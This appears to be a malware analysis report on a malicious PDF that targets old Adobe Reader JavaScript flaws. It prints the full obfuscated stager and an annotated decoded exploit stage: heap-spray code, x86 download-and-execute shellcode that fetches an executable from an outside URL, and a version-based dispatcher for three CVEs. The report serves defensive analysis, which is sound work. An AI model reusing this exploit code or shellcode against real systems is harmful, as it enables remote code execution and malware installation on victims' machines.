Malicious PDF — malware analysis report

Static analysis result for SHA-256 2aee5f8c9fbdc8d7…

MALICIOUS

PDF

4.4 KB Created: 2009-29-08 10:55:24 +03:00 (malformed timestamp — the month field is 29; /CreationDate is document-supplied metadata and must not be relied on for timelining) Authoring application: fackoPDF 7.02 (via BCL macroPDF 7.01) First seen: 2026-05-08
MD5: 595a6af282f9503240f2b8d01d0190f9 SHA-1: a07351a91e9e64dd389871cf6bc4d58ed4b0bebe SHA-256: 2aee5f8c9fbdc8d7ec13b8d794a08ca613256225a8e826a92817fdd5d1c7f351
372 Risk Score

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 11

  • Collab.getIcon — CVE-2009-0927 critical CVE exact CVE_2009_0927
    PDF JavaScript calls Collab.getIcon — CVE-2009-0927 is a stack buffer overflow in Adobe Reader triggered by Collab.getIcon() with a crafted argument. Allows arbitrary code execution. (identified after JavaScript deobfuscation)
  • Collab.collectEmailInfo — CVE-2007-5659 critical CVE exact CVE_2007_5659
    PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (identified after JavaScript deobfuscation)
  • util.printf — CVE-2008-2992 critical CVE exact CVE_2008_2992
    PDF JavaScript calls util.printf() — CVE-2008-2992 is a stack buffer overflow in Adobe Reader triggered by a long format-specifier argument. Widely exploited in the wild after disclosure. (identified after JavaScript deobfuscation) Reviewer note: in the decoded stage of this sample the util.printf("%45000f", ...) call is nested inside the viewerVersion >= 9 branch but guarded by viewerVersion >= 7.1 && viewerVersion < 9, so it can never execute; it remains a valid static indicator of the exploit-kit template, not a live exploitation path.
  • Pidief-style multi-CVE JavaScript dispatcher critical CVE likely PDF_PIDIEF_MULTI_CVE_DISPATCH
    A single JavaScript body branches on app.viewerVersion and invokes two or more of the canonical Reader sinks (Collab.collectEmailInfo, Collab.getIcon, util.printf with a field-width format string). This is the 2009-2010 Pidief.J multi-exploit landing template: a per-version dispatcher that fires the matching CVE chain for whichever Reader version opens the file. In this sample only two branches are reachable — Collab.collectEmailInfo for viewerVersion < 7.1 and Collab.getIcon for viewerVersion >= 9 — because the util.printf branch sits inside the >= 9 block behind an incompatible < 9 guard.
  • Quoted-hex fragment JavaScript stager high PDF_QUOTED_HEX_FRAGMENT_JS_STAGER
    PDF JavaScript stores the hidden exploit stage as many quoted hexadecimal fragments, joins them through helper functions, and evals the recovered JavaScript. The decoder is bounded and only fires when the recovered stage contains concrete Acrobat exploit APIs or heap-spray shellcode markers.
  • JavaScript action low 2 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF exploit shellcode contains an embedded download URL high PDF_JS_SHELLCODE_DOWNLOAD_URL
    Decoded PDF exploit shellcode contains a hardcoded http(s) URL — stored as little-endian %uXXXX Unicode escapes, or hex-encoded in a document metadata field (/CreationDate, /Title) and referenced from the decoded script. Reader exploit shellcode embeds the second-stage fetch URL this way and pulls it down with a urlmon/URLDownloadToFile-style download-and-execute (commodity downloader behaviour rather than a specific Acrobat CVE). In this sample the URL is carried in the %u-encoded shellcode string of the decoded stage; its trailing words decode little-endian to the address listed under Embedded URL.
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF paints image(s) but contains no text operators info PDF_IMAGE_ONLY_LURE
    PDF has 1 image XObject(s) and the content stream contains no text-emitting operators (BT/ET, Tj, TJ, ', ") in either raw bytes or decompressed streams — this is the screenshot-as-PDF pattern used to bypass text-based scanners and to deliver instructions purely through rendered pixels. It is informational unless paired with invisible links or risky URI context.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://socks5service.cn/u2/getexe.php Referenced by PDF JavaScript

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
javascript_obj0015_000.js pdf-javascript-stream PDF /JS object 15 at offset 0x317 9057 bytes
SHA-256: c237d3757f1e5f570a506e916c1e1d843dd290f229fe0cda5ac8f9676f39e50e
Preview script
First 1,000 lines of the extracted script
tratat = eval;function n97FqT (sda) {tratat(decodeURIComponent(sda));}function g1ysrI(d9Uv3A, uriuSo) {return ((uriuSo instanceof Array)?uriuSo.join(d9Uv3A):uriuSo);}function m1F8h56vm67NvbauZ() {var Ysx18o=new Array('20207661722055614866','784152397142734d5065','634a203d206e6577204172726179','28293b202076617220726e624f43','4b4c327875433669','4537533b202066756e6374696f6e','204b4f386e5a5a77','506c6f6d42544f5573287a37474f','5262505057635545726167682c2078','6f55594f517930466b','4b6a3070624c297b20202020','7768696c6520287a3747','4f5262505057635545726167','682e6c656e677468202a2032203c2078','6f55594f517930466b4b6a30','70624c297b2020202020207a37474f5262','50505763554572616768202b3d20','7a37474f52625050576355457261','67683b202020207d2020','20207a37474f52','625050576355','4572616768203d207a3747','4f5262505057635545726167682e','73756273747269','6e6728302c2078','6f55594f517930466b4b6a3070624c','202f2032293b202020','207265747572','6e207a37474f5262505057635545726167683b20','207d202066756e6374696f6e206d736a4e','54306d316d48456473764c72286c7051','39474f4857306346','495371644f297b2020','202076617220464e6d4457','5a4449715277694e4861','38203d20307830633063306330633b2020','2020766172207331464e5057');var bvjRob50IaNw8jP8z=g1ysrI("", Ysx18o);return bvjRob50IaNw8jP8z;}function TckqhrEdSpX3YSl1G() {var Ysx18o=new 
Array('74593030716231557a6a203d2075','6e657363617065282225754330333325','75384236342575333034302575304337','3825753430384225753842304325753143373025','75384241442575','30383538257530394542257534','303842257538443334257537433430257535','3838422575364133432575354134','3425754532443125754532324225','754543384225','7534464542257535323541257545','413833257538393536257530343535','25753537353625','75373338422575384233432575333337','34257530333738257535364633','2575373638422575','303332302575','3333463325753439433925753431','353025753333414425753336464625','754245304625','75303331342575463233','38257530383734257543464331','2575303330442575','3430464125754546454225753342353825','753735463825753545453525753436384225','7530333234257536364333257530433842','25753842343825753143353625754433','3033257530343842257530','3338412575354643332575','3530354525753844433325753038374425','75353235372575333342382575384143','4125754538354225754646413225','7546464646257543303332','2575463738422575','414546322575423834','4625753245','3635257537383635257536364142257536','3639382575423041422575384136432575');var W5QfenclX2sWYiaAS=g1ysrI("", Ysx18o);return W5QfenclX2sWYiaAS;}function AeVlT3n3VZ3mx7Ccl() {var Ysx18o=new Array('3938453025753638353025','75364536462575363432452575373536','3825753643373225753534364425','7538454238257530','4534452575464645432575303435352575353039','33257543303333257535303530257538423536','25753034353525','75433238332575383337','462575333143322575','353035322575','333642382575324631412575464637','3025753034353525753333354225','7535374646257542383536','2575464539','3825753045384125','75353546462575353730','3425754546423825754530434525754646','363025753034353525753734363825753730','37342575324633412575373332462575','36333646257537','333642257537','33333525753732','36352575363937362575363536332575363332','452575324636452575333237352575363732');var iEXXGQ5p9eza6stkO=g1ysrI("", Ysx18o);return iEXXGQ5p9eza6stkO;}function HTGw4Ji1QudBvsjT9() {var Ysx18o=new 
Array('46257537343635257537383635257532453635','25753638373025753030','373022293b202020206966','20286c705139474f48573063464953','71644f203d3d2031297b20202020','2020464e6d44575a4449715277694e48','6138203d2030','7833303330333033303b','202020207d2020202076617220','5a6d774e4c306742626375','7974553631203d2030783430303030303b','2020202076617220544b4f7572485331524a6252','6f62416620','3d207331464e5057','7459303071','6231557a6a2e6c656e6774','68202a20323b2020202076617220','786f55594f517930466b4b6a3070','624c203d205a6d774e4c30674262637579745536','31202d2028544b','4f7572485331524a6252','6f624166202b2030783338','293b20202020766172207a37474f5262505057','63554572616768203d20','756e6573636170652822257539303930257539','30393022293b202020207a37474f52','6250505763554572616768203d204b4f38','6e5a5a77506c6f6d42544f5573287a37474f52','625050576355','45726167682c20','786f55594f51793046','6b4b6a3070624c293b2020202076','6172204f383469476a75734d','6f71464a77476e203d2028464e6d4457','5a4449715277','694e486138202d2030','7834303030303029202f205a6d774e4c306742','62637579745536313b20202020666f7220287661','7220466568397741304e55','6b70494d7a786b');var fXxHCxsHqm2ERFevW=g1ysrI("", Ysx18o);return fXxHCxsHqm2ERFevW;}function cJyFEbR0TAccJAabM() {var Ysx18o=new 
Array('203d20303b20466568397741304e556b','70494d7a786b203c204f383469476a7573','4d6f71464a77476e3b2046656839774130','4e556b70494d7a786b202b2b2029','7b20202020202055614866784152397142734d50','65634a5b466568397741304e556b70494d7a78','6b5d203d207a37474f52625050','5763554572616768202b207331464e5057','74593030716231557a','6a3b202020207d20207d202066756e637469','6f6e205032544e6c','4e463843374e563364','4a4a28297b20202020766172207832534542','6263674d52796a5276545820','3d20303b2020202076617220547776694b417057','4844334b714c6530203d20617070','2e766965776572','56657273696f6e2e746f537472696e','6728293b2020202061','70702e636c65617254696d654f7574','28726e624f434b4c32787543366945','3753293b202020','20202069662028547776694b417057','4844334b714c6530203c','20372e31297b','2020202020206d736a4e5430','6d316d48456473764c722830','293b20202020202076617220');var bTeNGgbhvGdSrbHBZ=g1ysrI("", Ysx18o);return bTeNGgbhvGdSrbHBZ;}function DyZe9CHSMr4jOXOmn() {var Ysx18o=new Array('4c374f596931453553446e7430475237203d','20756e6573636170','65282225753063306325753063306322293b2020','202020207768696c6520284c374f59693145','3553446e74304752372e6c656e677468203c2034','34393532294c374f596931453553446e74304752','37202b3d204c374f59693145','3553446e74304752373b2020202020207468','6973202e636f6c6c616253746f','7265203d20436f','6c6c61622e','636f6c6c656374456d61','696c496e666f','287b20202020202020207375626a203a','2022222c206d7367203a204c374f59','6931453553446e74304752','372020202020207d20202020','2020293b202020207d20206966','2028547776694b4170','574844334b714c6530203e3d2039297b202020','2020207472','79207b2020696620286170702e64','6f632e436f6c6c61622e','67657449636f6e297b202020202020202020206d','736a4e54306d316d','48456473764c722832293b20202020202020','20202076617220764e6f585965357072373069');var IOV1e9SWjjhJG8UEg=g1ysrI("", Ysx18o);return IOV1e9SWjjhJG8UEg;}function sQpFIszhPNTDSriSW() {var Ysx18o=new 
Array('536e7270203d20756e65','73636170652822253039','22293b2020202020202020','20207768696c652028','764e6f585965357072','373069536e72702e6c656e677468203c203078','3430303029','764e6f585965','357072373069536e7270202b3d20764e6f585965','357072373069536e72703b2020','202020202020202076','4e6f58596535707237306953','6e7270203d20224e2e2220','2b20764e6f5859','65357072373069536e72','703b20206170702e646f632e436f6c6c61','622e67657449636f6e28764e6f58','5965357072373069536e7270293b20','202020202020202020','78325345426263674d','52796a52765458203d20313b2020','2020202020207d2020202020202020656c73','65207b20202020202020202020783253','45426263674d52796a52765458','203d20313b20202020','202020207d2020202020207d202020202020');var lu4aeluvtPAaZXT1M=g1ysrI("", Ysx18o);return lu4aeluvtPAaZXT1M;}function kize7TsYLb1sSvv4a() {var Ysx18o=new Array('636174636820','2865297b202020','20202020207832','5345426263674d52796a5276','5458203d20313b202020','2020207d202020202020696620','2878325345426263674d52796a52765458','203d3d2031297b202020202020','20206966202828547776694b417057484433','4b714c6530203e3d20372e312626','20547776694b4170574844334b714c6530203c20','3929297b2020202020','20202020206d','736a4e54306d316d48456473764c72283129','3b20202020202020202020','7661722057464f63476467697155637a','6c353679203d202231323939','39393939393939393939393939393939223b2020','2020202020202020666f7220','284d75577a59616f516879','39306d7a7a67203d20303b','204d75577a59616f51','687939306d7a7a67203c203237363b204d','75577a59616f51687939306d7a7a6720');var XxVaNfAwCdwYMEn6E=g1ysrI("", Ysx18o);return XxVaNfAwCdwYMEn6E;}function YKl3vmuOhqRHXPn8m() {var Ysx18o=new 
Array('2b2b20297b2020202020202020','2020202057464f63','476467697155637a6c35','3679202b3d202238223b2020202020','20202020207d202020202020202020207574696c','2e7072696e7466282225343530303066222c','2057464f63476467697155','637a6c353679','293b20202020202020207d20','20202020207d202020207d','20207d20206170702e744e4956327a457255','7172467678454d203d20503254','4e6c4e463843374e5633644a','4a3b2020726e624f434b4c32','7875433669453753203d','206170702e73657454696d654f','75742822617070','2e744e4956327a45','72557172467678454d2829222c20313029','3b2020');var uHjfvfEIu3O9UaqpL=g1ysrI("", Ysx18o);return uHjfvfEIu3O9UaqpL;}var Jn0pda8=m1F8h56vm67NvbauZ()/*GHaK3r&a3*/+TckqhrEdSpX3YSl1G()/*GHaK3r&a3*/+AeVlT3n3VZ3mx7Ccl()/*GHaK3r&a3*/+HTGw4Ji1QudBvsjT9()/*GHaK3r&a3*/+cJyFEbR0TAccJAabM()/*GHaK3r&a3*/+DyZe9CHSMr4jOXOmn()/*GHaK3r&a3*/+sQpFIszhPNTDSriSW()/*GHaK3r&a3*/+kize7TsYLb1sSvv4a()/*GHaK3r&a3*/+YKl3vmuOhqRHXPn8m();var upEvKV="";for (var h=0;h<Jn0pda8.length;h++) {upEvKV=upEvKV+"%"+Jn0pda8[h]+Jn0pda8[h+1];h++;}n97FqT(upEvKV);
quoted_hex_fragment_stage_000.js deobfuscated-js quoted-hex fragment decoded JavaScript object 15 at offset 0x3F1 3310 bytes
SHA-256: d8d2b9e664b73a431ec22735ba4b4cd1fb9bbc144a7f366a0fd7d97adaeb1049
Detection
ClamAV: No threats found (no signature match on the decoded stage; this does not lower the verdict, which rests on the deobfuscated exploit API calls and the shellcode download URL rather than on AV signatures)
Obfuscation or payload: likely
Carved artifact contains 5 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
// Decoded exploit stage carved from /JS object 15 (output of the quoted-hex stager).
// It heap-sprays a downloader shellcode and then triggers one of several Adobe Reader
// JavaScript API overflows selected by app.viewerVersion.
// Malicious sample — annotated for analysis only; never run outside an isolated environment.
var UaHfxAR9qBsMPecJ = new Array();  // heap-spray blocks are stored here so they stay referenced
var rnbOCKL2xuC6iE7S;  // timer id from app.setTimeOut at the bottom; cleared by the dispatcher
// Doubles z7GORbPPWcUEragh until it spans at least xoUYOQy0FkKj0pbL bytes, then cuts it
// to exactly that size. Lengths are UTF-16 code units, hence the "* 2" and "/ 2".
function KO8nZZwPlomBTOUs(z7GORbPPWcUEragh, xoUYOQy0FkKj0pbL){    while (z7GORbPPWcUEragh.length * 2 < xoUYOQy0FkKj0pbL){      z7GORbPPWcUEragh += z7GORbPPWcUEragh;    }    z7GORbPPWcUEragh = z7GORbPPWcUEragh.substring(0, xoUYOQy0FkKj0pbL / 2);    return z7GORbPPWcUEragh;  }
// Heap spray. lpQ9GOHW0cFISqdO selects the top address: 1 (the util.printf path) sprays
// up to 0x30303030, any other value up to 0x0c0c0c0c. Each block is a 0x400000-byte
// 0x90 NOP sled followed by the shellcode; (top - 0x400000) / 0x400000 blocks are built.
function msjNT0m1mHEdsvLr(lpQ9GOHW0cFISqdO){    var FNmDWZDIqRwiNHa8 = 0x0c0c0c0c;
    // %u-encoded x86 shellcode. Its trailing words decode little-endian to the second-stage
    // URL listed under Embedded URL; ASCII fragments "urlm", "on.d" and "e.ex" are also visible
    // in the bytes, consistent with the urlmon download-and-execute the report describes —
    // TODO(review): confirm by disassembly.
    var s1FNPWtY00qb1Uzj = unescape("%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455%u7468%u7074%u2F3A%u732F%u636F%u736B%u7335%u7265%u6976%u6563%u632E%u2F6E%u3275%u672F%u7465%u7865%u2E65%u6870%u0070");
    if (lpQ9GOHW0cFISqdO == 1){      FNmDWZDIqRwiNHa8 = 0x30303030;    }
    var ZmwNL0gBbcuytU61 = 0x400000;  // spray block size in bytes
    var TKOurHS1RJbRobAf = s1FNPWtY00qb1Uzj.length * 2;  // shellcode size in bytes
    var xoUYOQy0FkKj0pbL = ZmwNL0gBbcuytU61 - (TKOurHS1RJbRobAf + 0x38);  // sled size; 0x38 presumably reserves room for the JS string header
    var z7GORbPPWcUEragh = unescape("%u9090%u9090");  // NOP seed
    z7GORbPPWcUEragh = KO8nZZwPlomBTOUs(z7GORbPPWcUEragh, xoUYOQy0FkKj0pbL);
    var O84iGjusMoqFJwGn = (FNmDWZDIqRwiNHa8 - 0x400000) / ZmwNL0gBbcuytU61;  // number of blocks needed to reach the target address
    for (var Feh9wA0NUkpIMzxk = 0; Feh9wA0NUkpIMzxk < O84iGjusMoqFJwGn; Feh9wA0NUkpIMzxk ++ ){      UaHfxAR9qBsMPecJ[Feh9wA0NUkpIMzxk] = z7GORbPPWcUEragh + s1FNPWtY00qb1Uzj;    }  }
// Per-version dispatcher, run once from the app.setTimeOut at the bottom of the file.
function P2TNlNF8C7NV3dJJ(){    var x2SEBbcgMRyjRvTX = 0;
    var TwviKApWHD3KqLe0 = app.viewerVersion.toString();  // a string; the comparisons below coerce it back to a number
    app.clearTimeOut(rnbOCKL2xuC6iE7S);
    // Reader < 7.1: CVE-2007-5659. Spray to 0x0c0c0c0c, then overflow Collab.collectEmailInfo
    // with a msg of >= 44952 chars of 0x0c0c (the same value as the spray target).
    if (TwviKApWHD3KqLe0 < 7.1){      msjNT0m1mHEdsvLr(0);      var L7OYi1E5SDnt0GR7 = unescape("%u0c0c%u0c0c");      while (L7OYi1E5SDnt0GR7.length < 44952)L7OYi1E5SDnt0GR7 += L7OYi1E5SDnt0GR7;      this .collabStore = Collab.collectEmailInfo({        subj : "", msg : L7OYi1E5SDnt0GR7      }      );    }
    // Reader >= 9: CVE-2009-0927. Spray to 0x0c0c0c0c, then call Collab.getIcon with
    // "N." followed by 0x4000 tab characters. Every path through the try/catch sets the flag to 1.
    if (TwviKApWHD3KqLe0 >= 9){      try {  if (app.doc.Collab.getIcon){          msjNT0m1mHEdsvLr(2);          var vNoXYe5pr70iSnrp = unescape("%09");          while (vNoXYe5pr70iSnrp.length < 0x4000)vNoXYe5pr70iSnrp += vNoXYe5pr70iSnrp;          vNoXYe5pr70iSnrp = "N." + vNoXYe5pr70iSnrp;  app.doc.Collab.getIcon(vNoXYe5pr70iSnrp);          x2SEBbcgMRyjRvTX = 1;        }        else {          x2SEBbcgMRyjRvTX = 1;        }      }      catch (e){        x2SEBbcgMRyjRvTX = 1;      }
      // NOTE(review): this inner branch requires 7.1 <= viewerVersion < 9 but is nested inside
      // the >= 9 block above, so the CVE-2008-2992 util.printf("%45000f", ...) overflow
      // (spray target 0x30303030, 20+276-digit argument) is unreachable in this build —
      // most likely a template bug; it still marks the kit's intended third exploit.
      if (x2SEBbcgMRyjRvTX == 1){        if ((TwviKApWHD3KqLe0 >= 7.1&& TwviKApWHD3KqLe0 < 9)){          msjNT0m1mHEdsvLr(1);          var WFOcGdgiqUczl56y = "12999999999999999999";          for (MuWzYaoQhy90mzzg = 0; MuWzYaoQhy90mzzg < 276; MuWzYaoQhy90mzzg ++ ){            WFOcGdgiqUczl56y += "8";          }          util.printf("%45000f", WFOcGdgiqUczl56y);        }      }    }  }
// Trigger: the dispatcher is parked on the app object and fired 10 ms later through a
// string-form timeout rather than called directly (presumably so the document finishes loading first).
app.tNIV2zErUqrFvxEM = P2TNlNF8C7NV3dJJ;  rnbOCKL2xuC6iE7S = app.setTimeOut("app.tNIV2zErUqrFvxEM()", 10);